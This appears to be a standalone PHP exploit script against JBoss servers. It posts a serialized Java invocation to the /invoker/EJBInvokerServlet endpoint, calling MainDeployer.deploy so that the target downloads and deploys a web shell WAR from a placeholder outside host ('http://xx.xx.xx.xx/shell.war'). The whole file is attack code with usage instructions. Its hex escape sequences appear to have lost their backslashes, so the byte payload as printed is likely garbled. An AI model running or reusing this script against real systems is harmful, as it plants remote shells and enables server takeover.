<?php
$target = @$argv[1];
$procotol = @$argv[2];
if ($argc < 2) {
print "[-]:php Jboss.php https://targets:443 http/https
";
exit(1);
}
$url="http://xx.xx.xx.xx/shell.war";
$url_len=pack("n",strlen($url));
function hex_dump($data, $newline="
") {
static $from = '';
static $to = '';
static $width = 16; static $pad = '.';
if ($from==='') {
for ($i=0; $i<=0xFF; $i++) {
$from .= chr($i);
$to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;
}
}
$hex = str_split(bin2hex($data), $width*2);
$chars = str_split(strtr($data, $from, $to), $width);
$offset = 0;
foreach ($hex as $i => $line) {
echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline;
$offset += $width;
}
}
$frag_i=
"xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73". // ....sr.) org.jbos
"x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72". // s.invoca tion.Mar
"x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f". // shalledI nvocatio
"x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77". // n...'A>. ....xppw
"x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76". // .x..G..S .sr..jav
"x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2". // a.lang.I nteger..
"xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75". // .....8.. .I..valu
"x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e". // exr..jav a.lang.N
"x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00". // umber... ........
"x78x70x26x95xbex0ax73x72x00x24x6fx72x67x2ex6ax62". // xp&...sr .$org.jb
"x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d". // oss.invo cation.M
"x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc". // arshalle dValue..
"xe0xd1xf4x4axd0x99x0cx00x00x78x70x77";
$frag_ii="x00";
$frag_iii=
"xacxedx00x05x75x72x00x13x5bx4cx6ax61x76x61x2e". // .....ur. .[Ljava.
"x6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90xcex58x9f". // lang.Obj ect;..X.
"x10x73x29x6cx02x00x00x78x70x00x00x00x04x73x72x00". // .s)l...x p....sr.
"x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6dx65x6e". // .javax.m anagemen
"x74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03xa7x1b". // t.Object Name....
"xebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62x6fx73". // .m.....x pt.!jbos
"x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69x63x65". // s.system :service
"x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78x74x00". // =MainDep loyerxt.
"x06x64x65x70x6cx6fx79x75x71x00x7ex00x00x00x00x00". // .deployu q.~.....
"x01x74".
$url_len.
$url.
"x75x72x00".
"x13x5bx4cx6ax61x76x61x2ex6cx61". // ur..[ Ljava.la
"x6ex67x2ex53x74x72x69x6ex67x3bxadxd2x56xe7xe9x1d". // ng.Strin g;..V...
"x7bx47x02x00x00x78x70x00x00x00x01x74x00x10x6ax61". // {G...xp. ...t..ja
"x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67";
$frag_iv=
"x0dxd3".
"xbexc9x78x77x04x00x00x00x01x73x72x00x22x6fx72x67". // ..xw.... .sr."org
"x2ex6ax62x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6f". // .jboss.i nvocatio
"x6ex2ex49x6ex76x6fx63x61x74x69x6fx6ex4bx65x79xb8". // n.Invoca tionKey.
"xfbx72x84xd7x93x85xf9x02x00x01x49x00x07x6fx72x64". // .r...... ..I..ord
"x69x6ex61x6cx78x70x00x00x00x05x73x71x00x7ex00x05". // inalxp.. ..sq.~..
"x77x0dx00x00x00x05xacxedx00x05x70xfbx57xa7xaax78". // w....... ..p.W..x
"x77x04x00x00x00x03x73x71x00x7ex00x07x00x00x00x04". // w.....sq .~......
"x73x72x00x23x6fx72x67x2ex6ax62x6fx73x73x2ex69x6e". // sr.#org. jboss.in
"x76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61x74". // vocation .Invocat
"x69x6fx6ex54x79x70x65x59xa7x3ax1cxa5x2bx7cxbfx02". // ionTypeY .:..+|..
"x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00". // ..I..ord inalxp..
"x00x01x73x71x00x7ex00x07x00x00x00x0ax70x74x00x0f". // ..sq.~.. ....pt..
"x4ax4dx58x5fx4fx42x4ax45x43x54x5fx4ex41x4dx45x73". // JMX_OBJE CT_NAMEs
"x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65x6d". // r..javax .managem
"x65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0fx03". // ent.Obje ctName..
"xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x21x6ax62". // ...m.... .xpt.!jb
"x6fx73x73x2ex73x79x73x74x65x6dx3ax73x65x72x76x69". // oss.syst em:servi
"x63x65x3dx4dx61x69x6ex44x65x70x6cx6fx79x65x72x78". // ce=MainD eployerx
"x78"; // x
$data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv;
function vpost($url,$data){
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($curl, CURLOPT_USERAGENT,'java');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_TIMEOUT, 30);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$tmpInfo = curl_exec($curl);
if (curl_errno($curl)) {
echo "Curl https connect Error
";
}
curl_close($curl);
return "Curl https connect suscess
";
}
function tpost($url,$data){
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT,'java');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_TIMEOUT, 30);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$Info = curl_exec($curl);
if (curl_errno($curl)) {
echo "Curl http connect Error
";
}
curl_close($curl);
return "Curl http connect suscess
";
}
if($procotol == "https")
{
echo vpost($target."/invoker/EJBInvokerServlet/", $data);
}else if ($procotol == "http")
{
echo tpost($target."/invoker/EJBInvokerServlet/", $data);
}else
{
print "your not enter data
";
exit(0);
}
?>
Use: php jboss.php https://www.xx.com:443 http/https